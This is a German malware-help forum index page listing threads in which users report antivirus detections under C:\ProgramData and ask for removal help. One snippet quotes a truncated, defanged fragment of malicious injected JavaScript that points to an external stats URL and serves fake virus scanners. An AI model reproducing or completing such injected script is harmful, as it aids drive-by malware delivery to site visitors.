Zurück   Trojaner-Board > Themen

Alles zum Thema: Programdata

  Letzter Beitrag Antworten Hits Forum
TR/BProtctor.Gen
Programdata - Hallo liebes Team, ich weiß dieses Problem wurde schon einige Male behandelt, trotzdem hoffe ich auf eure Hilfe, da ich mich nicht so auskenne. Avira AntiVir geht regelmäßig mit dem Sicherheitshinweis "C:\ProgramData\BitGuard\2.7.1832.68\...\loader.dll" mit dem Virus "TR/BProtector.Gen" auf,...
Log-Analyse und Auswertung
TR/Crypt.ZPACK.43439
Programdata - Hallo Zusammen, ich habe einen neuen Laptop mit Windows 8. Nach ein paar Tagen hat Avira folgende Meldung gebracht: Typ: Datei Quelle: C:\ProgramData\mlywpys.dat Status: Infiziert Quarantäne-Objekt: 5533b2d0.qua Wiederhergestellt: NEIN Zu Avira hochgeladen: NEIN
Plagegeister aller Art und deren Bekämpfung
TR/BProtector.Gen
Programdata - Hallo, folgende betroffene Datei wird mir bei Avira angezeigt: C:\ProgramData\BitGuard\2.7.1769.27\{c16c1ccb-7046-4e5c-a2f3-533ad2fec8e8}\loader.dll Wenn ich der Meldung von Avira nachgehe und die Datei in Quarantäne stellen möchte, hat sich plötzlich mein Laptop runtergefahren mit der...
Log-Analyse und Auswertung
Verdacht auf Trojaner
Programdata - Hallo! Ich habe folgende Anwendung auf meinem PC gefunden: HPSFdetect - C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFdetect.exe Da ich dummer Weise einen download von einer Seite gemacht hab, die nicht aus Deutschland kam hatte ich alles Mögliche auf meinem...
Plagegeister aller Art und deren Bekämpfung
Was kann ich tun bei der Avira Meldung: C:\ProgramData\BitGuard\2.7.1832.68\...\loader.dll
Programdata - Mein PC zeigt mir ca alle fünf minuten diese Meldung an. Wenn ich auf Remove klick scannt der Pc und ich werde aufgefordert neu zu starten bzw startet der pc von alleine neu. Das kommt mir aber eher vor als würde er abstürzen und danach fängt das ganze spiel wieder von vorne an. Ich hoffe hier...
Plagegeister aller Art und deren Bekämpfung
TR/BProtector.Gen in C:\ProgramData\Bitguard\... entfernen, bräuchte leicht verständliche Hilfe ohne Fachjargon
Programdata - Hallo ihr Lieben, Mein Avira zeigt mir an, dass ich mir den BProtector eingefangen habe. Mit den bisher ergoogelten Tipps kann ich leider nichts anfangen, da mir dazu das Fachwissen fehlt. Wäre jemand so geduldig um mir zu erklären, wie ich ihn entfernen kann? Gern auch telefonisch. Liebe...
Plagegeister aller Art und deren Bekämpfung
Ordner kehrt immer wieder zurück: C:\ProgramData\boost_interprocess?
Programdata - Hallo liebe Gemeinde! Dieser Ordner in C:\ProgramData\ heist: boost_interprocess und enthält meisten noch einen Unterordner und gehört nach meinen Nachforschungen zum GMA/Bundes/Etc.-Trojaner. Ich habe Kein Java installiert! Ein zufälliger Scan mit dem AdwCleaner machte mich auf dem Ordner...
Plagegeister aller Art und deren Bekämpfung
BrowserProtect
Programdata - Hallo Leute, Ich hab vor hin bei Kaspersky angezeigt bekommen das ich ein Trojaner oder virus habe. Ich hab dann halt entfernen geklickt.Jetzt ist der bei 33% und kommt nicht weiter ist bei C:ProgramData\BrowserProtec... Stecken geblieben.Ich kann den Browser und andere Anwendungen nicht mehr...
Plagegeister aller Art und deren Bekämpfung
Avira meldet Virus oder unerwünschtes Programm 'APPL/BProtector.A' [program]
Programdata - Hallo, bei mir hat Avira folgendes gemeldet Die Datei 'C:\ProgramData\BrowserDefender\2.6.1519.190\{c16c1ccb-7046-4e5c-a2f3-533ad2fec8e8}\uninstall.exe' enthielt einen Virus oder unerwünschtes Programm 'APPL/BProtector.A' . Durchgeführte Aktion(en): Die Datei wurde ins...
Plagegeister aller Art und deren Bekämpfung
eGdpSvc.exe in C:\ProgramData\eSafe
Programdata - Hallo, mir ist die Datei eGdpSvc.exe aufgefallen, die mir nicht bekannt ist. Eine kurze Google-Suche hat mich gleich hierher geführt, weshalb ich gerne gleich ier um Hilfe bitten würde. Die Datei lässt sich nicht entfernen, sie wird nicht im Taskmanager angezeigt aber angeblich wird sie in Wsys...
Log-Analyse und Auswertung
Fehler: Das System kann den angegeben Pfad nicht finden | Avira
Programdata - Hey, also ich hab ein Problem mit dem Antiviren-Programm "Avast!". Ich hab grad eine vollständige Überprüfung durch genommen mit dem Antiviren-Programm und am Ende kamen die Meldungen, ca.30-50 Stück, Fehler: Das System kann den angegeben Pfad nicht finden. Der Dateipfad lautet so:...
Plagegeister aller Art und deren Bekämpfung
00000004.@ (Trojan.0Access) usw.
Programdata - Liebes Forum, mich plagen immer wieder die selben Meldungen von Avira: C:\$Recycle.Bin\S-1-5-18\$4c9a3b5a948dc1042a44f2036207415d\U\00000004.@ (Trojan.0Access) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\$Recycle.Bin\S-1-5-18\$4c9a3b5a948dc1042a44f2036207415d\U\00000008.@...
Plagegeister aller Art und deren Bekämpfung
Antivira Fehlercode 0x80070424
Programdata - Malwarebytes Anti-Malware (Test) 1.70.0.1100 www.malwarebytes.org Datenbank Version: v2013.02.04.08 Windows 7 Service Pack 1 x64 NTFS Internet Explorer 9.0.8112.16421 robin :: ROBIN-LP Schutz: Aktiviert
Log-Analyse und Auswertung
GVU Trojaner
Programdata - Diese Dateien wurden gelöscht C:\Users\Paul\wgsdgsdgdsgsd.dll (Trojan.FakeMS) C:\Users\Paul\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\1ede2ede-7970eec6 (Trojan.FakeMS) C:\ProgramData\dsgsdgdsgdsgw.pad (Exploit.Drop.GSA) C:\Users\Paul\AppData\Roaming\Microsoft\Windows\Start...
Log-Analyse und Auswertung
TR/Crypt.EPACK.Gen2 auf dem pc
Programdata - Hallo ihr.. Mein Echtzeitscanner von Avira hat mir heute morgen den TR/Crypt.EPACK.Gen2 Trojaner angezeigt. Hab ihn sooofort in die quarantäne gesteckt. er befindet sich in C:\ProgramData\CHECKPOINT\ZONEALARM\Data\avsys\temp\temporaryFolder\bases\sw2\klavasyswatch.dll Malwarebytes lass ich...
Plagegeister aller Art und deren Bekämpfung
OLT.TXT Editor
Programdata - OTL Logfile: OTL Extras logfile created on: 23.09.2012 18:54:46 - Run 1 OTL by OldTimer - Version 3.2.66.0 Folder = C:\Users\Norton\Desktop Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation Internet Explorer (Version = 7.0.6002.18005) Locale:...
Mülltonne
Virus? bitte um Hilfe
Programdata - Hi, ich habe mal wieder Probleme mit dem Lappi Win 7 Home installiert. Startet normal, ich sehe kurz meinen Desktop mit den Symbolen. Die Symbole verschwinden dann und nix geht mehr. Es kommt die Meldung schädliche elemente ermittelt und fertig. Meldung C:\programdata\vqbvxfbm.exe Kann mir...
Plagegeister aller Art und deren Bekämpfung
Fake Virusscanner
Programdata - Die Dateien werden von Webseiten heruntergeladen die diesen Code enthalten: < script > var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var...
Plagegeister aller Art und deren Bekämpfung
Trojaner Crypt.XPACK.Gen2/3/8 lässt mich nicht in Ruhe
Programdata - Tach geschätzte Community Gerade eben habe ich mich mit einem Trojaner infiziert, als ich ein paar Cheats für ein Spiel runterladen wollte - Dumm, ich weiss, aber aus lauter Verzweiflung macht man auch mal was dummes. Dafür sollte das infizieren mit einem Trojaner als Bestrafung eigentlich...
Log-Analyse und Auswertung
Mozilla Firefox lässt sich nicht mehr öffnen!
Programdata - Hallo, Heute früh war ich noch im Internet und schaltete in den Ruhezustand, als ich später wieder einschaltete stürzte der Lapi ab. WIndows musste dann reparieren und ich kam wieder auf meine Desktopseite, alles geht nur Mozilla nicht. Ich schreibe gerade über den Explorer das funktioniert...
Log-Analyse und Auswertung
w*w.westernunion(dot)com als unerwünschte startseite in ie9
Programdata - Schönen Guten Abend, ich habe leider seit gestern das Problem, dass bei mir im IE9 eine unerwünschte und für mich nicht löschbare Startseite namens w*w.westernunion(dot)com eingestellt ist. Heute bin ich hier beim googeln auf dasselbe Problem eines users im Forum gestossen dem kompetent geholfen...
Log-Analyse und Auswertung
TR/Dropper.Gen von meiner externen Festplatte entfernen?
Programdata - Liebe Helfer vom Trojaner-Board, ich habe auf meiner externen Festplatte Probleme mit einem Trojaner. Gemerkt habe ich dies, als auf einmal ungewöhnliche Verknüpfungen vorhandener Ordner auf der Festplatte angezeigt wurden, aber die Original-Ordner nicht sichtbar waren. Erst nachdem ich in den...
Log-Analyse und Auswertung
Zeitüberschreitung der Anforderung (sporadisch und regelmäßig) beim Ping
Programdata - Hallo! Nach einer langen Odyssee komme ich nun anscheinend endgültig nicht mehr weiter und habe mich dazu entschlossen, hier mein Problem zu posten. Vielleicht hat ja hier jemand ein ähnliches Problem, oder eine (von mir aus auch step-by-step) Lösung. Bereits unter Vista hatte ich im W-Lan...
Netzwerk und Hardware
Java/Runner.1458 - HJT logfileauswertung
Programdata - Hallo, bin neu hier, durch google auf euch aufmerksam geworden. habe durch antivir die meldung bekommen, dass java/runner.1458 gefunden wurde... habe mir nun hjt runtergeladenen und durchlaufen lassen.. kann mir bitte jemand helfen bezügl. der logauswertung, und was ich sonst noch tun kann ? ...
Log-Analyse und Auswertung
antivir meldet immer und mehrfach TR/Crypt.XPACK.Gen, wenn ich BitDefender ausführe
Programdata - hallo, bei mir wird von avira antivir die malware TR/Crypt.XPACK.Gen gefunden. kann jemand mir vielleicht sagen, wo das problem liegt? vielen dank, wenn jemand die antwort postet! ach ja: kino.to nutze ich garnicht mehr, weil firefox dabei immer abstirbt. womöglich kommt noch von da etwas? hatte...
Log-Analyse und Auswertung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.